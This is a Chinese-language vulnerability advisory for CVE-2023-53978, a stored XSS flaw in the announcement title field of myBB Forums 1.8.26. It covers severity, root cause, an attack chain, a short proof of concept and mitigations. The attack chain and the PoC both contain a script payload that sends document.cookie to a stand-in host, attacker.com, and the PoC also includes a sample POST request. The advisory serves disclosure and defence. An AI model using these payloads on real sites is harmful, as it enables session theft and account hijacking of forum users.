CVE-2023-53978 myBB Forums存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2023-53978

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

myBB Forums 1.8.26

漏洞概述

CVE-2023-53978是myBB Forums 1.8.26版本中存在的一个存储型跨站脚本(XSS)漏洞。该漏洞位于论坛公告系统模块，攻击者（需具有管理员权限）可以在创建公告时，通过公告标题字段注入恶意JavaScript代码。由于该载荷被存储在数据库中，当其他用户访问包含该公告的页面时，恶意脚本会在其浏览器上下文中执行。攻击者可利用此漏洞窃取会话Cookie、劫持用户账户、进行钓鱼攻击或修改页面内容。由于CVSS评分为5.4（中等严重性），且攻击复杂度较低，但需要低权限用户交互，因此实际危害程度取决于攻击者的目标受众范围。myBB是一个流行的开源论坛软件，广泛应用于各类社区网站，此漏洞可能影响大量使用该版本的用户。漏洞由VulnCheck发现并披露，披露日期为2025年12月22日。

技术细节

该漏洞的根本原因在于myBB Forums 1.8.26的公告系统模块对用户输入的公告标题缺乏充分的输入验证和输出编码。在论坛管理后台的'Forums and Posts' -> 'Forum Announcements'功能中，管理员可以创建新的论坛公告。系统在接受公告标题输入时，未对特殊字符和HTML/JavaScript标签进行过滤或转义处理，导致攻击者可以在标题字段中插入恶意脚本代码（如<script>alert(document.cookie)</script>）。当公告数据被存储到数据库后，每当有用户访问显示该公告的页面时，后端系统会直接将存储的内容输出到HTML页面中，而前端浏览器会将这些未转义的内容作为可执行脚本处理。由于攻击载荷永久存储在数据库中，所有访问该公告的用户都会受到攻击。此外，攻击者还可以利用此漏洞进行进一步的社会工程攻击，通过伪造页面内容诱导用户泄露敏感信息或执行其他危险操作。

攻击链分析

STEP 1

步骤1

攻击者获得myBB Forums 1.8.26的管理员账户访问权限

STEP 2

步骤2

攻击者登录管理后台，导航至'Forums and Posts' -> 'Forum Announcements' -> 'Add New Announcement'

STEP 3

步骤3

在公告标题输入框中注入恶意JavaScript代码，如<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

STEP 4

步骤4

提交并保存该公告，恶意载荷被永久存储到数据库中

STEP 5

步骤5

普通用户访问论坛首页或相关页面，查看包含该恶意公告的内容

STEP 6

步骤6

用户浏览器执行注入的恶意JavaScript代码，导致Cookie被窃取或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2023-53978 PoC - Stored XSS in myBB Forums 1.8.26 Announcement Title
// Target: myBB Forums <= 1.8.26
// Attack Vector: Create announcement with malicious script in title field

// Step 1: Authenticate as administrator on myBB admin panel
// Navigate to: Admin CP -> Forums and Posts -> Forum Announcements -> Add New

// Step 2: Insert XSS payload in the announcement title field
// Example payload:
// <script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

// Step 3: Save the announcement
// The malicious script will be stored and executed for all users viewing the announcement

// HTTP POST Request Example:
/*
POST /admin/index.php?module=forum-announcements HTTP/1.1
Host: target.com
Cookie: admin_sid=xxx; admin_a_sid=yyy
Content-Type: application/x-www-form-urlencoded

title=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&message=test&startdate=2025-01-01&enddate=2025-12-31&fid=1&submit=Submit
*/

影响范围

myBB Forums 1.8.26及之前版本

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）禁用或限制论坛公告功能的使用；2）对管理后台实施严格的访问控制，仅允许受信任的管理员访问；3）部署Web应用防火墙(WAF)规则检测和阻止XSS攻击载荷；4）对公告内容实施HTML过滤，移除script标签和事件处理器属性；5）监控管理后台活动日志，及时发现异常操作。